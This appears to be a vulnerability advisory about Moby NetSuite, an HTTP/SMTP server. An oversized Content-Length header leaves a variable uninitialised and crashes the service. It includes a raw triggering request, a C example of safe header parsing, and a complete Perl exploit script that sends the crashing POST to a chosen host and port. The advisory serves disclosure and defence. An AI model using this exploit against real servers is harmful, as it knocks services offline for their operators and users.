Summary:
Moby NetSuite is an HTTP/SMTP package designed for simplicity. It supports CGI, including POST form submissions. A vulnerability in the POST handler could lead to denial of service against the server.
Credit:
The information has been provided by Matthew Murphy.
Details:
When faced with a POST request, NetSuite allocates a buffer according to the incoming Content-Length header, reads in that number of bytes, and passes them on as the CGI process' STDIN stream. The byte count is taken from an atoi() call on the header value.
When the header's value is too large to fit in an integer, or is not numeric, the atoi() library call leaves the variable in its previous state. In this case the variable is undefined, as it holds no data before the length is determined. An sprintf() call that occurs while creating the CGI environment for the child then attempts to read the undefined data, resulting in an access violation. A restart of the service is required to regain normal functionality.
Example:
[Begin Session]
POST /cgi-bin/test.cgi HTTP/1.0
Content-Length: 111111111111111111111111111
A
[End Session]
NetSuite crashes within seconds with an access violation: illegal use of an uninitialized data variable.
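As an added example (not NetSuite's code), here is the kind of Content-Length handling that would have avoided the crash described above: the length variable is initialised before any early return, non-numeric and out-of-range values are rejected instead of being passed through atoi(), and the body size is capped before anything is allocated. MAX_BODY is an assumed policy value, not a NetSuite setting.

```c
#include <ctype.h>
#include <errno.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>

#define MAX_BODY (1024u * 1024u)   /* assumed per-request body cap (policy value) */

/* Returns 1 and sets *out on success.  Returns 0 and sets *out = 0 on any
 * failure, so the caller never reads a stale or uninitialised length.
 * Unlike atoi(), which signals neither overflow nor non-numeric input,
 * this rejects: empty/NULL, a leading sign, non-digit characters,
 * values that overflow, and values above MAX_BODY. */
static int parse_content_length(const char *hdr, size_t *out)
{
    char *end;
    unsigned long long v;

    *out = 0;                          /* initialise before any early return */
    if (hdr == NULL || !isdigit((unsigned char)hdr[0]))
        return 0;                      /* "", "A", "-5", " 1" */
    errno = 0;
    v = strtoull(hdr, &end, 10);
    if (errno == ERANGE)
        return 0;                      /* too large for the integer type */
    while (*end == ' ' || *end == '\t' || *end == '\r' || *end == '\n')
        end++;                         /* tolerate line-ending whitespace only */
    if (*end != '\0')
        return 0;                      /* trailing junk such as "12abc" */
    if (v > MAX_BODY)
        return 0;                      /* over policy: refuse, do not allocate */
    *out = (size_t)v;
    return 1;
}

/* Convenience wrapper: the accepted length, or -1 when the header is rejected. */
static long long accepted_length(const char *hdr)
{
    size_t n;
    return parse_content_length(hdr, &n) ? (long long)n : -1;
}

int main(void)
{
    /* The header value from the advisory's example session. */
    const char *hdr = "111111111111111111111111111";
    printf("Content-Length %s -> %lld\n", hdr, accepted_length(hdr));  /* -1 */
    return 0;
}
```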
Exploit:
#!/usr/bin/perl
#
# Moby NetSuite HTTP POST Denial of Service
# Discovery/Exploit by Matthew Murphy
use IO::Socket;
use URI::Escape;
$buffer = "POST /cgi-bin/%s HTTP/1.0\r\nContent-Length: 111111111111111111111111111\r\n\r\nA\r\n\r\n";
if (@ARGV < 2 || @ARGV > 3) {
print STDOUT "Usage: perl $0 [filename] [host] [port=80]\n";
exit;
}
$filename = uri_escape($ARGV[0]);
$port = 80;
if (@ARGV == 3) {
$port = $ARGV[2];
}
$f = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$ARGV[1],PeerPort=>$port);
if (defined($f)) {
$f->autoflush(1);
$attack = sprintf($buffer, $filename);
print $f $attack;
undef $f;
} else {
$mesg = sprintf("No listening socket on port %d of %s", $port, $ARGV[1]);
print STDOUT $mesg;
}